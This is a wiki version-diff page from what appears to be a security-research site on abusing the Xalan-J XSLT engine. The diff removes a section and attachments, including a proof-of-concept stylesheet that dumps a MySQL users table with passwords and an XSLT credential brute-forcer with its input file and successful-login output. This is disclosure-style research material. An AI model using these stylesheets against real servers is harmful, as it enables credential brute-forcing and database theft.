Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35
From version Icon 63.1 Icon
edited by Nicolas Gregoire
on 2012/01/12 22:14
Change comment: There is no comment for this version
To version Icon 57.2 Icon
edited by Nicolas Gregoire
on 2012/01/12 00:14
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -66,24 +66,4 @@
66 66  
67 67  == JDBC connectivity ==
68 68  
69 -It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver.
70 -
71 -=== Simple connection ===
72 -
73 -The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result.
74 -
75 -|=Namespace|=Extension function|=PoC
76 -|org.apache.xalan.lib.sql.XConnection|new(), query() and close()|[[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]]
77 -
78 -=== Credentials brute-forcing ===
79 -
80 -The [[xalanj-jdbc-bruteforce.xsl>>attach:xalanj-jdbc-bruteforce.xsl]] file will read some tuples (JDBC driver, database URL, username, passsword) from a XML file ([[xalanj-jdbc-bruteforce.xml>>attach:xalanj-jdbc-bruteforce.xml]]) and try to login with each one, effectively brute-forcing credentials from the engine side (usually on the backend ;-).
81 -
82 -
83 -Here's the output when launched from the CLI :
84 -
85 -##$> java org.apache.xalan.xslt.Process -in xalanj-jdbc-bruteforce.xml -xsl xalanj-jdbc-bruteforce.xsl 2> /dev/null
86 -Username : [root] / Password : [] :
87 -Username : [root] / Password : [uberpasswd] :
88 -Username : [root] / Password : [cnam] : OK !!
89 -Username : [pma] / Password : [pma] : ##
69 +xxx TODO xxx
Icon xalanj-jdbc-bruteforce.xml
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -775 bytes
Content
... ... @@ -1,35 +1,0 @@
1 -<data>
2 - <foobar>
3 - <DBINFO>
4 - <dbdriver>com.mysql.jdbc.Driver</dbdriver>
5 - <dburl>jdbc:mysql://localhost/</dburl>
6 - <user>root</user>
7 - <password></password>
8 - </DBINFO>
9 - </foobar>
10 - <foobar>
11 - <DBINFO>
12 - <dbdriver>com.mysql.jdbc.Driver</dbdriver>
13 - <dburl>jdbc:mysql://localhost/</dburl>
14 - <user>root</user>
15 - <password>uberpasswd</password>
16 - </DBINFO>
17 - </foobar>
18 - <foobar>
19 - <DBINFO>
20 - <dbdriver>com.mysql.jdbc.Driver</dbdriver>
21 - <dburl>jdbc:mysql://localhost/</dburl>
22 - <user>root</user>
23 - <password>cnam</password>
24 - </DBINFO>
25 - </foobar>
26 - <foobar>
27 - <DBINFO>
28 - <dbdriver>com.mysql.jdbc.Driver</dbdriver>
29 - <dburl>jdbc:mysql://localhost/</dburl>
30 - <user>pma</user>
31 - <password>pma</password>
32 - </DBINFO>
33 - </foobar>
34 -</data>
35 -
Icon xalanj-jdbc-bruteforce.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -979 bytes
Content
... ... @@ -1,29 +1,0 @@
1 -<?xml version="1.0"?>
2 -
3 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
4 - version="1.0"
5 - xmlns:sql="org.apache.xalan.lib.sql.XConnection"
6 - extension-element-prefixes="sql">
7 -
8 -<xsl:output method="text" indent="yes"/>
9 -<xsl:variable name="query">SELECT "OK !!"</xsl:variable>
10 -
11 -<xsl:template match="//data">
12 - <xsl:for-each select="foobar">
13 -
14 - <xsl:variable name="cinfo" select="DBINFO"/>
15 - <xsl:variable name="user" select="DBINFO/user/text()"/>
16 - <xsl:variable name="passwd" select="DBINFO/password/text()"/>
17 -
18 - <xsl:variable name="db" select="sql:new($cinfo)"/>
19 - <xsl:variable name="data" select='sql:query($db, $query)'/>
20 -
21 - <xsl:copy-of select="concat('Username : [', $user, '] / ')" />
22 - <xsl:copy-of select="concat('Password : [', $passwd, '] : ')" />
23 - <xsl:copy-of select="$data" /><xsl:copy-of select="'&#x0A;'" />
24 -
25 - </xsl:for-each>
26 -</xsl:template>
27 -
28 -</xsl:stylesheet>
29 -
Icon xalanj-jdbc-query.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -848 bytes
Content
... ... @@ -1,22 +1,0 @@
1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
2 - xmlns:sql="org.apache.xalan.lib.sql.XConnection"
3 - extension-element-prefixes="sql"
4 - version="1.0">
5 -
6 -<xsl:output method="xml" indent="yes"/>
7 -
8 -<xsl:param name="driver" select="'com.mysql.jdbc.Driver'"/>
9 -<xsl:param name="dburl" select="'jdbc:mysql://localhost/test_db'"/>
10 -<xsl:param name="user" select="'root'"/>
11 -<xsl:param name="pass" select="'14m31337'"/>
12 -<xsl:param name="query" select="'SELECT uid,username,passwd FROM users'"/>
13 -
14 -<xsl:template match="/">
15 - <xsl:variable name="dbh" select="sql:new($driver, $dburl, $user, $pass)"/>
16 - <xsl:variable name="table" select='sql:query($dbh, $query)'/>
17 - <xsl:copy-of select="$table" />
18 - <xsl:value-of select="sql:close($db)"/>
19 -</xsl:template>
20 -
21 -</xsl:stylesheet>
22 -